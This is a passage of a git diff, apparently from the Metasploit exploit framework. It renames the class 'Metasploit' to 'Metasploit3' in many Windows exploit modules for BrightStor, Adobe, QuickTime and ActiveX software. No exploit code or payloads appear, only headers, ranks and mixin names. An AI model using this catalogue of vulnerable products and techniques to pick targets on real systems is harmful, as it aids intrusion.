b/modules/exploits/windows/brightstor/lgserver_multi.rb index 26e60ee999..6f6bda88cd 100644 --- a/modules/exploits/windows/brightstor/lgserver_multi.rb +++ b/modules/exploits/windows/brightstor/lgserver_multi.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking diff --git a/modules/exploits/windows/brightstor/lgserver_rxrlogin.rb b/modules/exploits/windows/brightstor/lgserver_rxrlogin.rb index a4578a7d45..a54686a117 100644 --- a/modules/exploits/windows/brightstor/lgserver_rxrlogin.rb +++ b/modules/exploits/windows/brightstor/lgserver_rxrlogin.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/brightstor/lgserver_rxssetdatagrowthscheduleandfilter.rb b/modules/exploits/windows/brightstor/lgserver_rxssetdatagrowthscheduleandfilter.rb index e3e63efb15..bbbd6376ee 100644 --- a/modules/exploits/windows/brightstor/lgserver_rxssetdatagrowthscheduleandfilter.rb +++ b/modules/exploits/windows/brightstor/lgserver_rxssetdatagrowthscheduleandfilter.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking diff --git a/modules/exploits/windows/brightstor/lgserver_rxsuselicenseini.rb b/modules/exploits/windows/brightstor/lgserver_rxsuselicenseini.rb index aaf92631c8..e12c6efa64 100644 --- a/modules/exploits/windows/brightstor/lgserver_rxsuselicenseini.rb +++ b/modules/exploits/windows/brightstor/lgserver_rxsuselicenseini.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/brightstor/license_gcr.rb b/modules/exploits/windows/brightstor/license_gcr.rb index 02a5936701..53b03d3d27 100644 --- a/modules/exploits/windows/brightstor/license_gcr.rb +++ b/modules/exploits/windows/brightstor/license_gcr.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/brightstor/mediasrv_sunrpc.rb b/modules/exploits/windows/brightstor/mediasrv_sunrpc.rb index ed10d335f4..6ea0c62537 100644 --- a/modules/exploits/windows/brightstor/mediasrv_sunrpc.rb +++ b/modules/exploits/windows/brightstor/mediasrv_sunrpc.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::SunRPC diff --git a/modules/exploits/windows/brightstor/message_engine.rb b/modules/exploits/windows/brightstor/message_engine.rb index ee111d6f9e..af04cc4bf8 100644 --- a/modules/exploits/windows/brightstor/message_engine.rb +++ b/modules/exploits/windows/brightstor/message_engine.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::DCERPC diff --git a/modules/exploits/windows/brightstor/message_engine_72.rb b/modules/exploits/windows/brightstor/message_engine_72.rb index ab057c309f..f4ca613159 100644 --- a/modules/exploits/windows/brightstor/message_engine_72.rb +++ b/modules/exploits/windows/brightstor/message_engine_72.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking diff --git a/modules/exploits/windows/brightstor/message_engine_heap.rb b/modules/exploits/windows/brightstor/message_engine_heap.rb index 596cbd842e..5ba4ca46fb 100644 --- a/modules/exploits/windows/brightstor/message_engine_heap.rb +++ b/modules/exploits/windows/brightstor/message_engine_heap.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::DCERPC diff --git a/modules/exploits/windows/brightstor/sql_agent.rb b/modules/exploits/windows/brightstor/sql_agent.rb index 3253ac7c58..2785745edc 100644 --- a/modules/exploits/windows/brightstor/sql_agent.rb +++ b/modules/exploits/windows/brightstor/sql_agent.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/brightstor/tape_engine.rb b/modules/exploits/windows/brightstor/tape_engine.rb index 4a943562c3..dc9da31f15 100644 --- a/modules/exploits/windows/brightstor/tape_engine.rb +++ b/modules/exploits/windows/brightstor/tape_engine.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::DCERPC diff --git a/modules/exploits/windows/brightstor/tape_engine_0x8a.rb b/modules/exploits/windows/brightstor/tape_engine_0x8a.rb index dade3b80cb..6e55ba95b3 100644 --- a/modules/exploits/windows/brightstor/tape_engine_0x8a.rb +++ b/modules/exploits/windows/brightstor/tape_engine_0x8a.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking diff --git a/modules/exploits/windows/brightstor/universal_agent.rb b/modules/exploits/windows/brightstor/universal_agent.rb index 56c6653ed3..770d7c8fa9 100644 --- a/modules/exploits/windows/brightstor/universal_agent.rb +++ b/modules/exploits/windows/brightstor/universal_agent.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/browser/adobe_cooltype_sing.rb b/modules/exploits/windows/browser/adobe_cooltype_sing.rb index ebcc259078..2f18a7668a 100644 --- a/modules/exploits/windows/browser/adobe_cooltype_sing.rb +++ b/modules/exploits/windows/browser/adobe_cooltype_sing.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'zlib' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking # aslr+dep bypass, js heap spray, rop, stack bof include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/adobe_flash_avm2.rb b/modules/exploits/windows/browser/adobe_flash_avm2.rb index 90eb880d27..2194a15c1e 100644 --- a/modules/exploits/windows/browser/adobe_flash_avm2.rb +++ b/modules/exploits/windows/browser/adobe_flash_avm2.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/windows/browser/adobe_flash_casi32_int_overflow.rb b/modules/exploits/windows/browser/adobe_flash_casi32_int_overflow.rb index b281f6e695..57bc88f9aa 100644 --- a/modules/exploits/windows/browser/adobe_flash_casi32_int_overflow.rb +++ b/modules/exploits/windows/browser/adobe_flash_casi32_int_overflow.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/windows/browser/adobe_flash_copy_pixels_to_byte_array.rb b/modules/exploits/windows/browser/adobe_flash_copy_pixels_to_byte_array.rb index 6be4950219..34dcd36cb9 100644 --- a/modules/exploits/windows/browser/adobe_flash_copy_pixels_to_byte_array.rb +++ b/modules/exploits/windows/browser/adobe_flash_copy_pixels_to_byte_array.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/windows/browser/adobe_flash_domain_memory_uaf.rb b/modules/exploits/windows/browser/adobe_flash_domain_memory_uaf.rb index 28fbcca760..5b1fdf05f8 100644 --- a/modules/exploits/windows/browser/adobe_flash_domain_memory_uaf.rb +++ b/modules/exploits/windows/browser/adobe_flash_domain_memory_uaf.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/windows/browser/adobe_flash_filters_type_confusion.rb b/modules/exploits/windows/browser/adobe_flash_filters_type_confusion.rb index 6f52d4e504..ac3e425873 100644 --- a/modules/exploits/windows/browser/adobe_flash_filters_type_confusion.rb +++ b/modules/exploits/windows/browser/adobe_flash_filters_type_confusion.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/windows/browser/adobe_flash_mp4_cprt.rb b/modules/exploits/windows/browser/adobe_flash_mp4_cprt.rb index 2fc8845fdd..692e2be2fa 100644 --- a/modules/exploits/windows/browser/adobe_flash_mp4_cprt.rb +++ b/modules/exploits/windows/browser/adobe_flash_mp4_cprt.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/adobe_flash_otf_font.rb b/modules/exploits/windows/browser/adobe_flash_otf_font.rb index 7184c2377c..e1f1d0072b 100644 --- a/modules/exploits/windows/browser/adobe_flash_otf_font.rb +++ b/modules/exploits/windows/browser/adobe_flash_otf_font.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/adobe_flash_pcre.rb b/modules/exploits/windows/browser/adobe_flash_pcre.rb index 9950b96db5..f000571844 100644 --- a/modules/exploits/windows/browser/adobe_flash_pcre.rb +++ b/modules/exploits/windows/browser/adobe_flash_pcre.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking CLASSID = 'd27cdb6e-ae6d-11cf-96b8-444553540000' diff --git a/modules/exploits/windows/browser/adobe_flash_regex_value.rb b/modules/exploits/windows/browser/adobe_flash_regex_value.rb index 07c6b82945..7cd4e5d44e 100644 --- a/modules/exploits/windows/browser/adobe_flash_regex_value.rb +++ b/modules/exploits/windows/browser/adobe_flash_regex_value.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/windows/browser/adobe_flash_rtmp.rb b/modules/exploits/windows/browser/adobe_flash_rtmp.rb index 22d0d2a462..89e33338e5 100644 --- a/modules/exploits/windows/browser/adobe_flash_rtmp.rb +++ b/modules/exploits/windows/browser/adobe_flash_rtmp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/adobe_flash_sps.rb b/modules/exploits/windows/browser/adobe_flash_sps.rb index 32e363686e..8acbbb573a 100644 --- a/modules/exploits/windows/browser/adobe_flash_sps.rb +++ b/modules/exploits/windows/browser/adobe_flash_sps.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/adobe_flash_uncompress_zlib_uninitialized.rb b/modules/exploits/windows/browser/adobe_flash_uncompress_zlib_uninitialized.rb index c4b1a8d4d8..b4fa07267a 100644 --- a/modules/exploits/windows/browser/adobe_flash_uncompress_zlib_uninitialized.rb +++ b/modules/exploits/windows/browser/adobe_flash_uncompress_zlib_uninitialized.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/windows/browser/adobe_flash_worker_byte_array_uaf.rb b/modules/exploits/windows/browser/adobe_flash_worker_byte_array_uaf.rb index f57c5c7b8d..5575afab8c 100644 --- a/modules/exploits/windows/browser/adobe_flash_worker_byte_array_uaf.rb +++ b/modules/exploits/windows/browser/adobe_flash_worker_byte_array_uaf.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/windows/browser/adobe_flashplayer_arrayindexing.rb b/modules/exploits/windows/browser/adobe_flashplayer_arrayindexing.rb index b2e932709f..b1af657d89 100644 --- a/modules/exploits/windows/browser/adobe_flashplayer_arrayindexing.rb +++ b/modules/exploits/windows/browser/adobe_flashplayer_arrayindexing.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/adobe_flashplayer_avm.rb b/modules/exploits/windows/browser/adobe_flashplayer_avm.rb index f15f80ebbb..2fd3934e19 100644 --- a/modules/exploits/windows/browser/adobe_flashplayer_avm.rb +++ b/modules/exploits/windows/browser/adobe_flashplayer_avm.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb b/modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb index aac5a21551..3a7dcbd1c1 100644 --- a/modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb +++ b/modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/adobe_flashplayer_newfunction.rb b/modules/exploits/windows/browser/adobe_flashplayer_newfunction.rb index bf887c4c38..d512e180d4 100644 --- a/modules/exploits/windows/browser/adobe_flashplayer_newfunction.rb +++ b/modules/exploits/windows/browser/adobe_flashplayer_newfunction.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'zlib' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/adobe_flatedecode_predictor02.rb b/modules/exploits/windows/browser/adobe_flatedecode_predictor02.rb index 5f1882d1b6..bfcdff41d3 100644 --- a/modules/exploits/windows/browser/adobe_flatedecode_predictor02.rb +++ b/modules/exploits/windows/browser/adobe_flatedecode_predictor02.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'zlib' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/adobe_geticon.rb b/modules/exploits/windows/browser/adobe_geticon.rb index 156b8a3faa..cf67c75243 100644 --- a/modules/exploits/windows/browser/adobe_geticon.rb +++ b/modules/exploits/windows/browser/adobe_geticon.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'zlib' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/adobe_jbig2decode.rb b/modules/exploits/windows/browser/adobe_jbig2decode.rb index 68bb3ad128..92bece600b 100644 --- a/modules/exploits/windows/browser/adobe_jbig2decode.rb +++ b/modules/exploits/windows/browser/adobe_jbig2decode.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'zlib' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/adobe_media_newplayer.rb b/modules/exploits/windows/browser/adobe_media_newplayer.rb index 7853b61cfb..ab1bbc2970 100644 --- a/modules/exploits/windows/browser/adobe_media_newplayer.rb +++ b/modules/exploits/windows/browser/adobe_media_newplayer.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'zlib' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/adobe_shockwave_rcsl_corruption.rb b/modules/exploits/windows/browser/adobe_shockwave_rcsl_corruption.rb index 88cc480ed0..6d3843fb63 100644 --- a/modules/exploits/windows/browser/adobe_shockwave_rcsl_corruption.rb +++ b/modules/exploits/windows/browser/adobe_shockwave_rcsl_corruption.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/adobe_toolbutton.rb b/modules/exploits/windows/browser/adobe_toolbutton.rb index fd8ba6ca9c..388c30fe6b 100644 --- a/modules/exploits/windows/browser/adobe_toolbutton.rb +++ b/modules/exploits/windows/browser/adobe_toolbutton.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/windows/browser/adobe_utilprintf.rb b/modules/exploits/windows/browser/adobe_utilprintf.rb index 42b7c9d74c..392d49790e 100644 --- a/modules/exploits/windows/browser/adobe_utilprintf.rb +++ b/modules/exploits/windows/browser/adobe_utilprintf.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'zlib' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/advantech_webaccess_dvs_getcolor.rb b/modules/exploits/windows/browser/advantech_webaccess_dvs_getcolor.rb index f9e59c880c..1598534a4b 100644 --- a/modules/exploits/windows/browser/advantech_webaccess_dvs_getcolor.rb +++ b/modules/exploits/windows/browser/advantech_webaccess_dvs_getcolor.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/windows/browser/aim_goaway.rb b/modules/exploits/windows/browser/aim_goaway.rb index cd2bb32bde..cd7abc4965 100644 --- a/modules/exploits/windows/browser/aim_goaway.rb +++ b/modules/exploits/windows/browser/aim_goaway.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking # diff --git a/modules/exploits/windows/browser/aladdin_choosefilepath_bof.rb b/modules/exploits/windows/browser/aladdin_choosefilepath_bof.rb index 2af752e032..8ed7b765ad 100644 --- a/modules/exploits/windows/browser/aladdin_choosefilepath_bof.rb +++ b/modules/exploits/windows/browser/aladdin_choosefilepath_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/windows/browser/amaya_bdo.rb b/modules/exploits/windows/browser/amaya_bdo.rb index f7def26813..0ed7599111 100644 --- a/modules/exploits/windows/browser/amaya_bdo.rb +++ b/modules/exploits/windows/browser/amaya_bdo.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/aol_ampx_convertfile.rb b/modules/exploits/windows/browser/aol_ampx_convertfile.rb index 281365032c..618ceede6d 100644 --- a/modules/exploits/windows/browser/aol_ampx_convertfile.rb +++ b/modules/exploits/windows/browser/aol_ampx_convertfile.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/aol_icq_downloadagent.rb b/modules/exploits/windows/browser/aol_icq_downloadagent.rb index 6835a56277..6426521138 100644 --- a/modules/exploits/windows/browser/aol_icq_downloadagent.rb +++ b/modules/exploits/windows/browser/aol_icq_downloadagent.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/apple_itunes_playlist.rb b/modules/exploits/windows/browser/apple_itunes_playlist.rb index 5169f604ef..38e8c16c39 100644 --- a/modules/exploits/windows/browser/apple_itunes_playlist.rb +++ b/modules/exploits/windows/browser/apple_itunes_playlist.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/apple_quicktime_marshaled_punk.rb b/modules/exploits/windows/browser/apple_quicktime_marshaled_punk.rb index 38c2a11aaa..8907f6869c 100644 --- a/modules/exploits/windows/browser/apple_quicktime_marshaled_punk.rb +++ b/modules/exploits/windows/browser/apple_quicktime_marshaled_punk.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/apple_quicktime_mime_type.rb b/modules/exploits/windows/browser/apple_quicktime_mime_type.rb index fac8e3beef..69d6b8a164 100644 --- a/modules/exploits/windows/browser/apple_quicktime_mime_type.rb +++ b/modules/exploits/windows/browser/apple_quicktime_mime_type.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/apple_quicktime_rtsp.rb b/modules/exploits/windows/browser/apple_quicktime_rtsp.rb index aaac0aed53..0a2cdaa1ed 100644 --- a/modules/exploits/windows/browser/apple_quicktime_rtsp.rb +++ b/modules/exploits/windows/browser/apple_quicktime_rtsp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/apple_quicktime_smil_debug.rb b/modules/exploits/windows/browser/apple_quicktime_smil_debug.rb index db868afe9f..2355aab342 100644 --- a/modules/exploits/windows/browser/apple_quicktime_smil_debug.rb +++ b/modules/exploits/windows/browser/apple_quicktime_smil_debug.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking # needs more testing/targets to be Great include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/apple_quicktime_texml_font_table.rb b/modules/exploits/windows/browser/apple_quicktime_texml_font_table.rb index 78eee4832c..6d58e6d12d 100644 --- a/modules/exploits/windows/browser/apple_quicktime_texml_font_table.rb +++ b/modules/exploits/windows/browser/apple_quicktime_texml_font_table.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ask_shortformat.rb b/modules/exploits/windows/browser/ask_shortformat.rb index 5a0e9fb6d0..f73ec53adf 100644 --- a/modules/exploits/windows/browser/ask_shortformat.rb +++ b/modules/exploits/windows/browser/ask_shortformat.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/asus_net4switch_ipswcom.rb b/modules/exploits/windows/browser/asus_net4switch_ipswcom.rb index c1e66bd060..1bd56b231c 100644 --- a/modules/exploits/windows/browser/asus_net4switch_ipswcom.rb +++ b/modules/exploits/windows/browser/asus_net4switch_ipswcom.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/athocgov_completeinstallation.rb b/modules/exploits/windows/browser/athocgov_completeinstallation.rb index 176aae2ca5..695e939113 100644 --- a/modules/exploits/windows/browser/athocgov_completeinstallation.rb +++ b/modules/exploits/windows/browser/athocgov_completeinstallation.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/autodesk_idrop.rb b/modules/exploits/windows/browser/autodesk_idrop.rb index f0c41d3cfe..523b471db6 100644 --- a/modules/exploits/windows/browser/autodesk_idrop.rb +++ b/modules/exploits/windows/browser/autodesk_idrop.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/aventail_epi_activex.rb b/modules/exploits/windows/browser/aventail_epi_activex.rb index d3112a607d..a8e80a26fa 100644 --- a/modules/exploits/windows/browser/aventail_epi_activex.rb +++ b/modules/exploits/windows/browser/aventail_epi_activex.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking # heap spray and address shifty include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/awingsoft_web3d_bof.rb b/modules/exploits/windows/browser/awingsoft_web3d_bof.rb index 3dfa37101c..770403a7c7 100644 --- a/modules/exploits/windows/browser/awingsoft_web3d_bof.rb +++ b/modules/exploits/windows/browser/awingsoft_web3d_bof.rb @@ -23,7 +23,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/awingsoft_winds3d_sceneurl.rb b/modules/exploits/windows/browser/awingsoft_winds3d_sceneurl.rb index 1f3803d162..d0be485f04 100644 --- a/modules/exploits/windows/browser/awingsoft_winds3d_sceneurl.rb +++ b/modules/exploits/windows/browser/awingsoft_winds3d_sceneurl.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/baofeng_storm_onbeforevideodownload.rb b/modules/exploits/windows/browser/baofeng_storm_onbeforevideodownload.rb index 83c14d6a2c..271caa3851 100644 --- a/modules/exploits/windows/browser/baofeng_storm_onbeforevideodownload.rb +++ b/modules/exploits/windows/browser/baofeng_storm_onbeforevideodownload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/barcode_ax49.rb b/modules/exploits/windows/browser/barcode_ax49.rb index 36ebd1a1e8..bf6181bd25 100644 --- a/modules/exploits/windows/browser/barcode_ax49.rb +++ b/modules/exploits/windows/browser/barcode_ax49.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/blackice_downloadimagefileurl.rb b/modules/exploits/windows/browser/blackice_downloadimagefileurl.rb index a99002c7a2..3a63699a2f 100644 --- a/modules/exploits/windows/browser/blackice_downloadimagefileurl.rb +++ b/modules/exploits/windows/browser/blackice_downloadimagefileurl.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/c6_messenger_downloaderactivex.rb b/modules/exploits/windows/browser/c6_messenger_downloaderactivex.rb index baddb60210..b4ffe3edf2 100644 --- a/modules/exploits/windows/browser/c6_messenger_downloaderactivex.rb +++ b/modules/exploits/windows/browser/c6_messenger_downloaderactivex.rb @@ -5,7 +5,7 @@ require 'msf/core' 